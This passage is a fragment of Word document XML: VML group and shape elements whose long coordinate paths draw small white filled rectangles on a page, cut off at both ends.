52,6027,8155,6027,8158,6027,8161,6027,8164,6027,8167,6027,8170,6027,8173,6027,8176,6027,8179,6027,8183,6027,8186,6027,8190,6027,8193,6027,8197,6027,8201,6027,8205,6027,8209,6027,8213,6027,8217,6027,8221,6027,8226,6027,8230,6027,8234,6027,8239,6027,8244,6027,8249,6027,8253,6027,8258,6027,8263,6027,8269,6027,8274,6027,8279,6027,8285,6027,8290,6027,8296,6027,8302,6027,8307,6027,8313,6027,8319,6027,8326,6027,8332,6027,8338,6027,8338,6027,8338,6027,8338,6027,8338,6027,8338,6027,8338,6027,8338,6027,8338,6027,8338,6027,8338,6027,8338,6027,8338,6027,8338,6027,8338,6027,8338,6027,8338,6027,8338,6027,8338,6027,8338,6027,8338,6026,8338,6026,8338,6026,8338,6026,8338,6026,8338,6026,8338,6026,8338,6026,8338,6025,8338,6025,8338,6025,8338,6025,8338,6025,8338,6024,8338,6024,8338,6024,8338,6024,8338,6023,8338,6023,8338,6023,8338,6022,8338,6022,8338,6022,8338,6021,8338,6021,8338,6021,8338,6020,8338,6020,8338,6019,8338,6019,8338,6018,8338,6018,8338,6017,8338,6016,8338,6016,8338,6015,8338,6015,8338,6014,8338,6013,8338,6012,8338,6012,8338,6011,8338,6010,8338,6009,8338,6008,8338,6007,8338,6007,8338,6006,8338,6005,8338,6004,8338,6003,8338,6002,8338,6000,8338,5999,8338,5998,8338,5997,8338,5996,8338,5995,8338,5993,8338,5992,8338,5991,8338,5989,8338,5988,8338,5986,8338,5985,8338,5983,8338,5982,8338,5980,8338,5978,8338,5977,8338,5975,8338,5973,8338,5972,8338,5970,8338,5968,8338,5966,8338,5964,8338,5962,8338,5960,8338,5958,8338,5956,8338,5954,8338,5951,8338,5949,8338,5947,8338,5945,8338,5942,8338,5940,8338,5937,8338,5935,8338,5932,8338,5930,8338,5927,8338,5924,8338,5921,8338,5919,8338,5916,8338,5913,8338,5910,8338,5907,8338,5907,8338,5907,8338,5907,8338,5907,8338,5907,8338,5907,8338,5907,8338,5907,8338,5907,8338,5907,8338,5907,8338,5907,8338,5907,8338,5907,8338,5907,8338,5907,8338,5907,8338,5907,8337,5907,8337,5907,8337,5907,8337,5907,8337,5907,8337,5907,8336,5907,8336,5907,8336,5907,8336,5907,8335,5907,8335,5907,8335,5907,8334,5907,8334,5907,8333,5907,8333,5907,8332,5907,8332,5907,8331,5907,8331,5907,8330,5907,8329,5907,8329,5907,8328,5907,8327,5907,8326,5907,8325,5907,8324,5907,8323,5907,8322,5907,8321,5907,8320,5907,8319,5907,8318,5907,8317,5907,8316,5907,8314,5907,8313,5907,8312,5907,8310,5907,8309,5907,8307,5907,8305,5907,8304,5907,8302,5907,8300,5907,8299,5907,8297,5907,8295,5907,8293,5907,8291,5907,8288,5907,8286,5907,8284,5907,8282,5907,8279,5907,8277,5907,8274,5907,8272,5907,8269,5907,8266,5907,8264,5907,8261,5907,8258,5907,8255,5907,8252,5907,8248,5907,8245,5907,8242,5907,8239,5907,8235,5907,8231,5907,8228,5907,8224,5907,8220,5907,8216,5907,8212,5907,8208,5907,8204,5907,8200,5907,8196,5907,8191,5907,8187,5907,8182,5907,8178,5907,8173,5907,8168,5907,8163,5907,8158,5907,8153,5907,8147,5907,8142,5907,8137,5907,8131,5907,8125,5907,8120,5907,8114,5907,8108,5907,8102,5907,8096,5907,8089,5907,8083e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:144.500pt;margin-top:421.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2890,8430" coordsize="130,270">
        <v:shape style="position:absolute;left:2890;top:8430;width:130;height:270" coordorigin="2890,8430" coordsize="130,270" path="m2905,8458l2905,8458,2905,8458,2905,8458,2905,8458,2905,8458,2905,8458,2905,8458,2905,8458,2905,8458,2906,8458,2906,8458,2906,8458,2906,8458,2906,8458,2906,8458,2906,8458,2906,8458,2906,8458,2906,8458,2906,8458,2906,8458,2906,8458,2906,8458,2906,8458,2906,8458,2907,8458,2907,8458,2907,8458,2907,8458,2907,8458,2907,8458,2908,8458,2908,8458,2908,8458,2908,8458,2909,8458,2909,8458,2909,8458,2909,8458,2910,8458,2910,8458,2910,8458,2911,8458,2911,8458,2912,8458,2912,8458,2912,8458,2913,8458,2913,8458,2914,8458,2914,8458,2915,8458,2915,8458,2916,8458,2917,8458,2917,8458,2918,8458,2919,8458,2919,8458,2920,8458,2921,8458,2922,8458,2922,8458,2923,8458,2924,8458,2925,8458,2926,8458,2927,8458,2928,8458,2929,8458,2930,8458,2931,8458,2932,8458,2933,8458,2934,8458,2936,8458,2937,8458,2938,8458,2939,8458,2941,8458,2942,8458,2943,8458,2945,8458,2946,8458,2948,8458,2949,8458,2951,8458,2952,8458,2954,8458,2956,8458,2957,8458,2959,8458,2961,8458,2963,8458,2965,8458,2967,8458,2968,8458,2970,8458,2973,8458,2975,8458,2977,8458,2979,8458,2981,8458,2983,8458,2986,8458,2988,8458,2990,8458,2993,8458,2995,8458,2998,8458,3000,8458,3003,8458,3006,8458,3008,8458,3011,8458,3014,8458,3017,8458,3020,8458,3023,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8459,3026,8459,3026,8459,3026,8459,3026,8459,3026,8459,3026,8459,3026,8459,3026,8459,3026,8460,3026,8460,3026,8460,3026,8460,3026,8461,3026,8461,3026,8461,3026,8462,3026,8462,3026,8462,3026,8463,3026,8463,3026,8464,3026,8464,3026,8465,3026,8465,3026,8466,3026,8467,3026,8467,3026,8468,3026,8469,3026,8469,3026,8470,3026,8471,3026,8472,3026,8473,3026,8474,3026,8475,3026,8476,3026,8477,3026,8478,3026,8480,3026,8481,3026,8482,3026,8483,3026,8485,3026,8486,3026,8488,3026,8489,3026,8491,3026,8493,3026,8494,3026,8496,3026,8498,3026,8500,3026,8502,3026,8504,3026,8506,3026,8508,3026,8510,3026,8512,3026,8515,3026,8517,3026,8520,3026,8522,3026,8525,3026,8527,3026,8530,3026,8533,3026,8536,3026,8539,3026,8542,3026,8545,3026,8548,3026,8551,3026,8555,3026,8558,3026,8561,3026,8565,3026,8569,3026,8572,3026,8576,3026,8580,3026,8584,3026,8588,3026,8592,3026,8596,3026,8601,3026,8605,3026,8610,3026,8614,3026,8619,3026,8624,3026,8629,3026,8634,3026,8639,3026,8644,3026,8649,3026,8654,3026,8660,3026,8665,3026,8671,3026,8677,3026,8683,3026,8689,3026,8695,3026,8701,3026,8707,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3025,8713,3025,8713,3025,8713,3025,8713,3025,8713,3025,8713,3025,8713,3025,8713,3025,8713,3025,8713,3025,8713,3025,8713,3025,8713,3025,8713,3025,8713,3025,8713,3025,8713,3025,8713,3024,8713,3024,8713,3024,8713,3024,8713,3024,8713,3024,8713,3023,8713,3023,8713,3023,8713,3023,8713,3022,8713,3022,8713,3022,8713,3022,8713,3021,8713,3021,8713,3021,8713,3020,8713,3020,8713,3019,8713,3019,8713,3019,8713,3018,8713,3018,8713,3017,8713,3017,8713,3016,8713,3016,8713,3015,8713,3014,8713,3014,8713,3013,8713,3012,8713,3012,8713,3011,8713,3010,8713,3009,8713,3009,8713,3008,8713,3007,8713,3006,8713,3005,8713,3004,8713,3003,8713,3002,8713,3001,8713,3000,8713,2999,8713,2998,8713,2997,8713,2995,8713,2994,8713,2993,8713,2992,8713,2990,8713,2989,8713,2988,8713,2986,8713,2985,8713,2983,8713,2982,8713,2980,8713,2979,8713,2977,8713,2975,8713,2974,8713,2972,8713,2970,8713,2968,8713,2966,8713,2964,8713,2962,8713,2960,8713,2958,8713,2956,8713,2954,8713,2952,8713,2950,8713,2948,8713,2945,8713,2943,8713,2941,8713,2938,8713,2936,8713,2933,8713,2931,8713,2928,8713,2925,8713,2923,8713,2920,8713,2917,8713,2914,8713,2911,8713,2908,8713,2905,8713,2905,8713,2905,8713,2905,8713,2905,8713,2905,8713,2905,8713,2905,8713,2905,8713,2905,8713,2905,8713,2905,8713,2905,8713,2905,8713,2905,8713,2905,8713,2905,8713,2905,8713,2905,8713,2905,8713,2905,8712,2905,8712,2905,8712,2905,8712,2905,8712,2905,8711,2905,8711,2905,8711,2905,8710,2905,8710,2905,8710,2905,8709,2905,8709,2905,8708,2905,8708,2905,8707,2905,8707,2905,8706,2905,8706,2905,8705,2905,8704,2905,8704,2905,8703,2905,8702,2905,8701,2905,8700,2905,8700,2905,8699,2905,8698,2905,8697,2905,8696,2905,8694,2905,8693,2905,8692,2905,8691,2905,8690,2905,8688,2905,8687,2905,8685,2905,8684,2905,8682,2905,8681,2905,8679,2905,8677,2905,8676,2905,8674,2905,8672,2905,8670,2905,8668,2905,8666,2905,8664,2905,8661,2905,8659,2905,8657,2905,8654,2905,8652,2905,8650,2905,8647,2905,8644,2905,8642,2905,8639,2905,8636,2905,8633,2905,8630,2905,8627,2905,8624,2905,8620,2905,8617,2905,8614,2905,8610,2905,8607,2905,8603,2905,8599,2905,8595,2905,8592,2905,8588,2905,8584,2905,8579,2905,8575,2905,8571,2905,8566,2905,8562,2905,8557,2905,8553,2905,8548,2905,8543,2905,8538,2905,8533,2905,8528,2905,8523,2905,8517,2905,8512,2905,8506,2905,8501,2905,8495,2905,8489,2905,8483,2905,8477,2905,8471,2905,8465,2905,8458e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:421.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,8430" coordsize="130,270">
        <v:shape style="position:absolute;left:3010;top:8430;width:130;height:270" coordorigin="3010,8430" coordsize="130,270" path="m3026,8458l3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3026,8458,3027,8458,3027,8458,3027,8458,3027,8458,3027,8458,3027,8458,3027,8458,3028,8458,3028,8458,3028,8458,3028,8458,3029,8458,3029,8458,3029,8458,3029,8458,3030,8458,3030,8458,3030,8458,3031,8458,3031,8458,3032,8458,3032,8458,3032,8458,3033,8458,3033,8458,3034,8458,3034,8458,3035,8458,3036,8458,3036,8458,3037,8458,3037,8458,3038,8458,3039,8458,3039,8458,3040,8458,3041,8458,3042,8458,3043,8458,3043,8458,3044,8458,3045,8458,3046,8458,3047,8458,3048,8458,3049,8458,3050,8458,3051,8458,3052,8458,3053,8458,3054,8458,3056,8458,3057,8458,3058,8458,3059,8458,3061,8458,3062,8458,3063,8458,3065,8458,3066,8458,3068,8458,3069,8458,3071,8458,3072,8458,3074,8458,3076,8458,3077,8458,3079,8458,3081,8458,3083,8458,3085,8458,3087,8458,3089,8458,3091,8458,3093,8458,3095,8458,3097,8458,3099,8458,3101,8458,3103,8458,3106,8458,3108,8458,3110,8458,3113,8458,3115,8458,3118,8458,3120,8458,3123,8458,3126,8458,3128,8458,3131,8458,3134,8458,3137,8458,3140,8458,3143,8458,3146,8458,3146,8458,3146,8458,3146,8458,3146,8458,3146,8458,3146,8458,3146,8458,3146,8458,3146,8458,3146,8458,3146,8458,3146,8458,3146,8459,3146,8459,3146,8459,3146,8459,3146,8459,3146,8459,3146,8459,3146,8459,3146,8459,3146,8460,3146,8460,3146,8460,3146,8460,3146,8461,3146,8461,3146,8461,3146,8462,3146,8462,3146,8462,3146,8463,3146,8463,3146,8464,3146,8464,3146,8465,3146,8465,3146,8466,3146,8467,3146,8467,3146,8468,3146,8469,3146,8469,3146,8470,3146,8471,3146,8472,3146,8473,3146,8474,3146,8475,3146,8476,3146,8477,3146,8478,3146,8480,3146,8481,3146,8482,3146,8483,3146,8485,3146,8486,3146,8488,3146,8489,3146,8491,3146,8493,3146,8494,3146,8496,3146,8498,3146,8500,3146,8502,3146,8504,3146,8506,3146,8508,3146,8510,3146,8512,3146,8515,3146,8517,3146,8520,3146,8522,3146,8525,3146,8527,3146,8530,3146,8533,3146,8536,3146,8539,3146,8542,3146,8545,3146,8548,3146,8551,3146,8555,3146,8558,3146,8561,3146,8565,3146,8569,3146,8572,3146,8576,3146,8580,3146,8584,3146,8588,3146,8592,3146,8596,3146,8601,3146,8605,3146,8610,3146,8614,3146,8619,3146,8624,3146,8629,3146,8634,3146,8639,3146,8644,3146,8649,3146,8654,3146,8660,3146,8665,3146,8671,3146,8677,3146,8683,3146,8689,3146,8695,3146,8701,3146,8707,3146,8713,3146,8713,3146,8713,3146,8713,3146,8713,3146,8713,3146,8713,3146,8713,3146,8713,3146,8713,3146,8713,3146,8713,3145,8713,3145,8713,3145,8713,3145,8713,3145,8713,3145,8713,3145,8713,3145,8713,3145,8713,3145,8713,3145,8713,3145,8713,3145,8713,3145,8713,3144,8713,3144,8713,3144,8713,3144,8713,3144,8713,3144,8713,3143,8713,3143,8713,3143,8713,3143,8713,3143,8713,3142,8713,3142,8713,3142,8713,3141,8713,3141,8713,3141,8713,3140,8713,3140,8713,3140,8713,3139,8713,3139,8713,3138,8713,3138,8713,3137,8713,3137,8713,3136,8713,3136,8713,3135,8713,3134,8713,3134,8713,3133,8713,3132,8713,3132,8713,3131,8713,3130,8713,3129,8713,3129,8713,3128,8713,3127,8713,3126,8713,3125,8713,3124,8713,3123,8713,3122,8713,3121,8713,3120,8713,3119,8713,3118,8713,3117,8713,3116,8713,3114,8713,3113,8713,3112,8713,3110,8713,3109,8713,3108,8713,3106,8713,3105,8713,3103,8713,3102,8713,3100,8713,3099,8713,3097,8713,3095,8713,3094,8713,3092,8713,3090,8713,3088,8713,3086,8713,3084,8713,3083,8713,3081,8713,3079,8713,3076,8713,3074,8713,3072,8713,3070,8713,3068,8713,3065,8713,3063,8713,3061,8713,3058,8713,3056,8713,3053,8713,3051,8713,3048,8713,3045,8713,3043,8713,3040,8713,3037,8713,3034,8713,3031,8713,3029,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8712,3026,8712,3026,8712,3026,8712,3026,8712,3026,8711,3026,8711,3026,8711,3026,8710,3026,8710,3026,8710,3026,8709,3026,8709,3026,8708,3026,8708,3026,8707,3026,8707,3026,8706,3026,8706,3026,8705,3026,8704,3026,8704,3026,8703,3026,8702,3026,8701,3026,8700,3026,8700,3026,8699,3026,8698,3026,8697,3026,8696,3026,8694,3026,8693,3026,8692,3026,8691,3026,8690,3026,8688,3026,8687,3026,8685,3026,8684,3026,8682,3026,8681,3026,8679,3026,8677,3026,8676,3026,8674,3026,8672,3026,8670,3026,8668,3026,8666,3026,8664,3026,8661,3026,8659,3026,8657,3026,8654,3026,8652,3026,8650,3026,8647,3026,8644,3026,8642,3026,8639,3026,8636,3026,8633,3026,8630,3026,8627,3026,8624,3026,8620,3026,8617,3026,8614,3026,8610,3026,8607,3026,8603,3026,8599,3026,8595,3026,8592,3026,8588,3026,8584,3026,8579,3026,8575,3026,8571,3026,8566,3026,8562,3026,8557,3026,8553,3026,8548,3026,8543,3026,8538,3026,8533,3026,8528,3026,8523,3026,8517,3026,8512,3026,8506,3026,8501,3026,8495,3026,8489,3026,8483,3026,8477,3026,8471,3026,8465,3026,8458e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:216.500pt;margin-top:439.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4330,8790" coordsize="130,270">
        <v:shape style="position:absolute;left:4330;top:8790;width:130;height:270" coordorigin="4330,8790" coordsize="130,270" path="m4346,8818l4346,8818,4346,8818,4346,8818,4346,8818,4346,8818,4346,8818,4346,8818,4346,8818,4346,8818,4346,8818,4346,8818,4346,8818,4346,8818,4346,8818,4346,8818,4346,8818,4346,8818,4347,8818,4347,8818,4347,8818,4347,8818,4347,8818,4347,8818,4347,8818,4347,8818,4347,8818,4347,8818,4348,8818,4348,8818,4348,8818,4348,8818,4348,8818,4349,8818,4349,8818,4349,8818,4349,8818,4350,8818,4350,8818,4350,8818,4350,8818,4351,8818,4351,8818,4351,8818,4352,8818,4352,8818,4353,8818,4353,8818,4354,8818,4354,8818,4355,8818,4355,8818,4356,8818,4356,8818,4357,8818,4357,8818,4358,8818,4359,8818,4359,8818,4360,8818,4361,8818,4362,8818,4362,8818,4363,8818,4364,8818,4365,8818,4366,8818,4367,8818,4368,8818,4369,8818,4370,8818,4371,8818,4372,8818,4373,8818,4374,8818,4375,8818,4376,8818,4377,8818,4379,8818,4380,8818,4381,8818,4383,8818,4384,8818,4385,8818,4387,8818,4388,8818,4390,8818,4392,8818,4393,8818,4395,8818,4396,8818,4398,8818,4400,8818,4402,8818,4403,8818,4405,8818,4407,8818,4409,8818,4411,8818,4413,8818,4415,8818,4417,8818,4420,8818,4422,8818,4424,8818,4426,8818,4429,8818,4431,8818,4433,8818,4436,8818,4438,8818,4441,8818,4444,8818,4446,8818,4449,8818,4452,8818,4455,8818,4457,8818,4460,8818,4463,8818,4466,8818,4466,8818,4466,8818,4466,8818,4466,8818,4466,8818,4466,8818,4466,8818,4466,8818,4466,8819,4466,8819,4466,8819,4466,8819,4466,8819,4466,8819,4466,8819,4466,8819,4466,8819,4466,8819,4466,8819,4466,8819,4466,8820,4466,8820,4466,8820,4466,8820,4466,8821,4466,8821,4466,8821,4466,8821,4466,8822,4466,8822,4466,8823,4466,8823,4466,8823,4466,8824,4466,8824,4466,8825,4466,8826,4466,8826,4466,8827,4466,8827,4466,8828,4466,8829,4466,8830,4466,8830,4466,8831,4466,8832,4466,8833,4466,8834,4466,8835,4466,8836,4466,8837,4466,8839,4466,8840,4466,8841,4466,8842,4466,8844,4466,8845,4466,8846,4466,8848,4466,8850,4466,8851,4466,8853,4466,8855,4466,8856,4466,8858,4466,8860,4466,8862,4466,8864,4466,8866,4466,8868,4466,8870,4466,8873,4466,8875,4466,8877,4466,8880,4466,8882,4466,8885,4466,8888,4466,8890,4466,8893,4466,8896,4466,8899,4466,8902,4466,8905,4466,8908,4466,8911,4466,8915,4466,8918,4466,8922,4466,8925,4466,8929,4466,8933,4466,8936,4466,8940,4466,8944,4466,8948,4466,8952,4466,8957,4466,8961,4466,8965,4466,8970,4466,8974,4466,8979,4466,8984,4466,8989,4466,8994,4466,8999,4466,9004,4466,9009,4466,9015,4466,9020,4466,9025,4466,9031,4466,9037,4466,9043,4466,9049,4466,9055,4466,9061,4466,9067,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4465,9074,4465,9074,4465,9074,4465,9074,4465,9074,4465,9074,4465,9074,4465,9074,4464,9074,4464,9074,4464,9074,4464,9074,4463,9074,4463,9074,4463,9074,4463,9074,4462,9074,4462,9074,4462,9074,4461,9074,4461,9074,4461,9074,4460,9074,4460,9074,4459,9074,4459,9074,4458,9074,4458,9074,4457,9074,4457,9074,4456,9074,4456,9074,4455,9074,4454,9074,4454,9074,4453,9074,4452,9074,4452,9074,4451,9074,4450,9074,4449,9074,4448,9074,4448,9074,4447,9074,4446,9074,4445,9074,4444,9074,4443,9074,4442,9074,4441,9074,4440,9074,4439,9074,4437,9074,4436,9074,4435,9074,4434,9074,4432,9074,4431,9074,4430,9074,4428,9074,4427,9074,4426,9074,4424,9074,4422,9074,4421,9074,4419,9074,4418,9074,4416,9074,4414,9074,4413,9074,4411,9074,4409,9074,4407,9074,4405,9074,4403,9074,4401,9074,4399,9074,4397,9074,4395,9074,4393,9074,4391,9074,4388,9074,4386,9074,4384,9074,4381,9074,4379,9074,4377,9074,4374,9074,4371,9074,4369,9074,4366,9074,4363,9074,4361,9074,4358,9074,4355,9074,4352,9074,4349,9074,4346,9074,4346,9074,4346,9074,4346,9074,4346,9074,4346,9074,4346,9074,4346,9074,4346,9074,4346,9073,4346,9073,4346,9073,4346,9073,4346,9073,4346,9073,4346,9073,4346,9073,4346,9073,4346,9073,4346,9073,4346,9073,4346,9072,4346,9072,4346,9072,4346,9072,4346,9071,4346,9071,4346,9071,4346,9071,4346,9070,4346,9070,4346,9069,4346,9069,4346,9069,4346,9068,4346,9068,4346,9067,4346,9067,4346,9066,4346,9065,4346,9065,4346,9064,4346,9063,4346,9062,4346,9062,4346,9061,4346,9060,4346,9059,4346,9058,4346,9057,4346,9056,4346,9055,4346,9053,4346,9052,4346,9051,4346,9050,4346,9048,4346,9047,4346,9046,4346,9044,4346,9042,4346,9041,4346,9039,4346,9037,4346,9036,4346,9034,4346,9032,4346,9030,4346,9028,4346,9026,4346,9024,4346,9022,4346,9019,4346,9017,4346,9015,4346,9012,4346,9010,4346,9007,4346,9004,4346,9002,4346,8999,4346,8996,4346,8993,4346,8990,4346,8987,4346,8984,4346,8981,4346,8977,4346,8974,4346,8970,4346,8967,4346,8963,4346,8959,4346,8956,4346,8952,4346,8948,4346,8944,4346,8940,4346,8935,4346,8931,4346,8927,4346,8922,4346,8918,4346,8913,4346,8908,4346,8903,4346,8898,4346,8893,4346,8888,4346,8883,4346,8878,4346,8872,4346,8867,4346,8861,4346,8855,4346,8849,4346,8843,4346,8837,4346,8831,4346,8825,4346,8818e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:240.500pt;margin-top:439.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4810,8790" coordsize="130,270">
        <v:shape style="position:absolute;left:4810;top:8790;width:130;height:270" coordorigin="4810,8790" coordsize="130,270" path="m4826,8818l4826,8818,4826,8818,4826,8818,4826,8818,4826,8818,4826,8818,4826,8818,4826,8818,4826,8818,4826,8818,4827,8818,4827,8818,4827,8818,4827,8818,4827,8818,4827,8818,4827,8818,4827,8818,4827,8818,4827,8818,4827,8818,4827,8818,4827,8818,4827,8818,4827,8818,4828,8818,4828,8818,4828,8818,4828,8818,4828,8818,4828,8818,4829,8818,4829,8818,4829,8818,4829,8818,4829,8818,4830,8818,4830,8818,4830,8818,4831,8818,4831,8818,4831,8818,4832,8818,4832,8818,4833,8818,4833,8818,4833,8818,4834,8818,4834,8818,4835,8818,4835,8818,4836,8818,4836,8818,4837,8818,4838,8818,4838,8818,4839,8818,4840,8818,4840,8818,4841,8818,4842,8818,4843,8818,4843,8818,4844,8818,4845,8818,4846,8818,4847,8818,4848,8818,4849,8818,4850,8818,4851,8818,4852,8818,4853,8818,4854,8818,4855,8818,4856,8818,4858,8818,4859,8818,4860,8818,4862,8818,4863,8818,4864,8818,4866,8818,4867,8818,4869,8818,4870,8818,4872,8818,4873,8818,4875,8818,4877,8818,4878,8818,4880,8818,4882,8818,4884,8818,4886,8818,4888,8818,4889,8818,4891,8818,4893,8818,4896,8818,4898,8818,4900,8818,4902,8818,4904,8818,4907,8818,4909,8818,4911,8818,4914,8818,4916,8818,4919,8818,4921,8818,4924,8818,4927,8818,4929,8818,4932,8818,4935,8818,4938,8818,4941,8818,4943,8818,4946,8818,4946,8818,4946,8818,4946,8818,4946,8818,4946,8818,4946,8818,4946,8818,4946,8818,4946,8819,4946,8819,4946,8819,4946,8819,4946,8819,4946,8819,4946,8819,4946,8819,4946,8819,4946,8819,4946,8819,4946,8819,4946,8820,4946,8820,4946,8820,4946,8820,4946,8821,4946,8821,4946,8821,4946,8821,4946,8822,4946,8822,4946,8823,4946,8823,4946,8823,4946,8824,4946,8824,4946,8825,4946,8826,4946,8826,4946,8827,4946,8827,4946,8828,4946,8829,4946,8830,4946,8830,4946,8831,4946,8832,4946,8833,4946,8834,4946,8835,4946,8836,4946,8837,4946,8839,4946,8840,4946,8841,4946,8842,4946,8844,4946,8845,4946,8846,4946,8848,4946,8850,4946,8851,4946,8853,4946,8855,4946,8856,4946,8858,4946,8860,4946,8862,4946,8864,4946,8866,4946,8868,4946,8870,4946,8873,4946,8875,4946,8877,4946,8880,4946,8882,4946,8885,4946,8888,4946,8890,4946,8893,4946,8896,4946,8899,4946,8902,4946,8905,4946,8908,4946,8911,4946,8915,4946,8918,4946,8922,4946,8925,4946,8929,4946,8933,4946,8936,4946,8940,4946,8944,4946,8948,4946,8952,4946,8957,4946,8961,4946,8965,4946,8970,4946,8974,4946,8979,4946,8984,4946,8989,4946,8994,4946,8999,4946,9004,4946,9009,4946,9015,4946,9020,4946,9025,4946,9031,4946,9037,4946,9043,4946,9049,4946,9055,4946,9061,4946,9067,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4945,9074,4945,9074,4945,9074,4945,9074,4945,9074,4945,9074,4944,9074,4944,9074,4944,9074,4944,9074,4943,9074,4943,9074,4943,9074,4943,9074,4942,9074,4942,9074,4942,9074,4941,9074,4941,9074,4940,9074,4940,9074,4940,9074,4939,9074,4939,9074,4938,9074,4938,9074,4937,9074,4936,9074,4936,9074,4935,9074,4935,9074,4934,9074,4933,9074,4933,9074,4932,9074,4931,9074,4930,9074,4930,9074,4929,9074,4928,9074,4927,9074,4926,9074,4925,9074,4924,9074,4923,9074,4922,9074,4921,9074,4920,9074,4919,9074,4918,9074,4916,9074,4915,9074,4914,9074,4913,9074,4911,9074,4910,9074,4909,9074,4907,9074,4906,9074,4904,9074,4903,9074,4901,9074,4900,9074,4898,9074,4896,9074,4895,9074,4893,9074,4891,9074,4889,9074,4887,9074,4885,9074,4883,9074,4881,9074,4879,9074,4877,9074,4875,9074,4873,9074,4871,9074,4869,9074,4866,9074,4864,9074,4862,9074,4859,9074,4857,9074,4854,9074,4852,9074,4849,9074,4846,9074,4844,9074,4841,9074,4838,9074,4835,9074,4832,9074,4829,9074,4826,9074,4826,9074,4826,9074,4826,9074,4826,9074,4826,9074,4826,9074,4826,9074,4826,9074,4826,9073,4826,9073,4826,9073,4826,9073,4826,9073,4826,9073,4826,9073,4826,9073,4826,9073,4826,9073,4826,9073,4826,9073,4826,9072,4826,9072,4826,9072,4826,9072,4826,9071,4826,9071,4826,9071,4826,9071,4826,9070,4826,9070,4826,9069,4826,9069,4826,9069,4826,9068,4826,9068,4826,9067,4826,9067,4826,9066,4826,9065,4826,9065,4826,9064,4826,9063,4826,9062,4826,9062,4826,9061,4826,9060,4826,9059,4826,9058,4826,9057,4826,9056,4826,9055,4826,9053,4826,9052,4826,9051,4826,9050,4826,9048,4826,9047,4826,9046,4826,9044,4826,9042,4826,9041,4826,9039,4826,9037,4826,9036,4826,9034,4826,9032,4826,9030,4826,9028,4826,9026,4826,9024,4826,9022,4826,9019,4826,9017,4826,9015,4826,9012,4826,9010,4826,9007,4826,9004,4826,9002,4826,8999,4826,8996,4826,8993,4826,8990,4826,8987,4826,8984,4826,8981,4826,8977,4826,8974,4826,8970,4826,8967,4826,8963,4826,8959,4826,8956,4826,8952,4826,8948,4826,8944,4826,8940,4826,8935,4826,8931,4826,8927,4826,8922,4826,8918,4826,8913,4826,8908,4826,8903,4826,8898,4826,8893,4826,8888,4826,8883,4826,8878,4826,8872,4826,8867,4826,8861,4826,8855,4826,8849,4826,8843,4826,8837,4826,8831,4826,8825,4826,8818e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:294.500pt;margin-top:439.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5890,8790" coordsize="130,270">
        <v:shape style="position:absolute;left:5890;top:8790;width:130;height:270" coordorigin="5890,8790" coordsize="130,270" path="m5907,8818l5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5908,8818,5908,8818,5908,8818,5908,8818,5908,8818,5908,8818,5908,8818,5908,8818,5909,8818,5909,8818,5909,8818,5909,8818,5909,8818,5910,8818,5910,8818,5910,8818,5910,8818,5911,8818,5911,8818,5911,8818,5912,8818,5912,8818,5912,8818,5913,8818,5913,8818,5913,8818,5914,8818,5914,8818,5915,8818,5915,8818,5916,8818,5916,8818,5917,8818,5918,8818,5918,8818,5919,8818,5919,8818,5920,8818,5921,8818,5922,8818,5922,8818,5923,8818,5924,8818,5925,8818,5926,8818,5927,8818,5927,8818,5928,8818,5929,8818,5930,8818,5931,8818,5932,8818,5934,8818,5935,8818,5936,8818,5937,8818,5938,8818,5940,8818,5941,8818,5942,8818,5943,8818,5945,8818,5946,8818,5948,8818,5949,8818,5951,8818,5952,8818,5954,8818,5956,8818,5957,8818,5959,8818,5961,8818,5962,8818,5964,8818,5966,8818,5968,8818,5970,8818,5972,8818,5974,8818,5976